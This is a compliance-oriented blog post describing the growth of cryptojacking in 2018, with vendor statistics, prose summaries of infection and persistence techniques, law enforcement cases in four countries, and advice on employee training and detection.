Cryptojacking Expands Its Reach

Jonathan J. Rusch

Corporate compliance officers who have only general knowledge of longstanding cybersecurity threats, such as phishing and ransomware, need to familiarize themselves with the growing threat of “cryptojacking.”  Cryptojacking, also known as malicious cryptomining, is the unauthorized installation and use of cryptocurrency mining software on computers and mobile devices.

Cryptomining, of course, is integral to the verification of cybercurrency transactions and addition of those transactions to the blockchain digital ledger.  But cryptomining “consumes processor cycles and their requisite electricity to process cryptocurrency transactions,” while earning the cryptominer using his own computer only a small amount of cryptocurrency.   Because generation of more substantial amounts of cryptocurrency require vastly greater amounts of electricity and processing power, cybercriminals increasingly seek to outsource their cryptomining operations by obtaining unauthorized access to others’ computers, where they can draw on unused processing power.

If cryptojacking was already “out of control” in 2017, as a Wired article headline declared, more recent reports from cybersecurity firms indicate that cryptojacking in 2018 is (if it is possible) even more so:

  • In June, a Kaspersky Labs report stated that during the 2017-2018 period, “cryptominer encounters rose in total number, from 1.9 million to 2.7 million, as well as in share of threats detected, from 3% to 4%.”
  • In August, Trend Micro reported that in the first half of 2018, it had 787,146 cryptocurrency mining detections – 1,055 percent of the detections in the first half of 2017 (74,547) and 241 percent of the detections in the second half of 2017 (326,326) – and identified 47 new cryptomining malware families.
  • In September, McAfee found that total cryptomining malware samples grew by 86 percent in the second quarter of 2018, and identified more than 2.5 million new cryptojacking files.

Moreover, certain features of current cryptojacking indicate that the problem is becoming more pervasive and more sophisticated:

  • Geographic Expansion: Cryptojacking malware is being detected around the world, most notably in North and South America, Europe, and Asia.
  • Expansion To and Within Corporate Entities: Cryptojacking is not limited to home computer users.  In July, Kaspersky Lab analysts reported that they had observed a new cryptojacking, Power Ghost, that “is capable of stealthily establishing itself in a system and spreading across large corporate networks infecting both workstations and servers.”  According to a Forbes article, cryptojackers are increasingly targeting servers. “Running in corporate and cloud data centers, servers are both vast in number and far more powerful than PCs and mobile devices, presenting . . . a fertile field for planting cryptojacking software.”
  • Infection Techniques: What makes PowerGhost more complex to detect and remove is its use of fileless techniques to embed the miner within the target system. The Kaspersky analysts noted that during the infection process, which can be done with exploits or remote administration tools, “a one-line PowerShell script is run that downloads the miner’s body and immediately launches it without writing it to the hard drive.”
  • Location of Cryptojacking Malware: Cryptojacking software can be embedded in places that are atypical of other types of malware.  For example, security researchers reportedly “found cryptojacking code hidden on the Los Angeles Times’ interactive Homicide Report webpage that was quietly harnessing visitors’ CPUs to mine Monero cryptocurrency.”
  • Malicious Response to Removal: 360 Total Security reported about one type of cryptomining malware that has been coded to ensure that an attempt to remove it will crash the computer. At the outset, the malware launches a system process that is part of the Windows operating system, svchost.exe, and injects malicious code into it.  It then sets svchost.exe’s attribute to “CriticalProcess.” That means that an attempt to terminate the malware will be read by the system as interference with a legitimate critical process in Windows and crash the computer.

Because cryptojacking necessarily involves unauthorized access to computers, law enforcement authorities are prepared to investigate and prosecute cryptojacking schemes as cybercrime.  During 2018, at least four countries pursued law enforcement actions against cryptojacking:

  • China: 20 suspects were arrested “in a major cryptojacking case allegedly affecting over one million computers and generating 15 million yuan (about $2.2 million) in illicit profit.”
  • Iceland: Police arrested 11 individuals in connection with the theft, from data centers in Iceland, of approximately 600 computers being used to mine bitcoin and other virtual currencies.
  • Japan: Authorities arrested 16 men for allegedly using their websites to disseminate cryptomining malware, and a Japanese court reportedly sentenced a man who had used his blog to infect visitors with cryptomining malware, engaged in cryptomining to one year’s imprisonment (suspended for three years).
  • Russia: Security officers arrested “several scientists working at a top-secret Russian nuclear warhead facility for allegedly mining crypto-currencies.”

Compliance officers and their information security counterparts therefore need to recognize that cryptojacking is a cybercrime and treat it accordingly.  That means conducting a thorough review of what their companies are doing to address cryptojacking, including ensuring that their companies are using artificial intelligence and other techniques to identify penetration of corporate networks by cryptojacking teams.  But it also means refreshing compliance training to increase employee awareness of cryptomining across the enterprise.  Employees who notice significant slowing of their computers should be encouraged to report such occurrences, as they may be indicative of cryptojacking malware at work.

Finally, cryptojacking training needs to make clear to corporate employees that using company resources for cryptomining is prohibited under all circumstances.  In one case, the cybersecurity firm Darktrace

picked up on puzzling traffic patterns within a European bank, including servers that seemed to be connecting from an IP address in the company’s data center. When they inspected it in person, by physically tracing cables, its experts realized that a rogue employee had set up a “c[r]ypto mining side business” under the floorboards.

Published by Jonathan J. Rusch

I'm a lawyer and consultant interested in corporate- and individual-compliance issues, and an inveterate part-time law professor; a former federal prosecutor, regulator, and anti-bribery and corruption compliance head at a global financial institution; and a (very minor) shareholder in Williams Grand Prix Engineering.

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s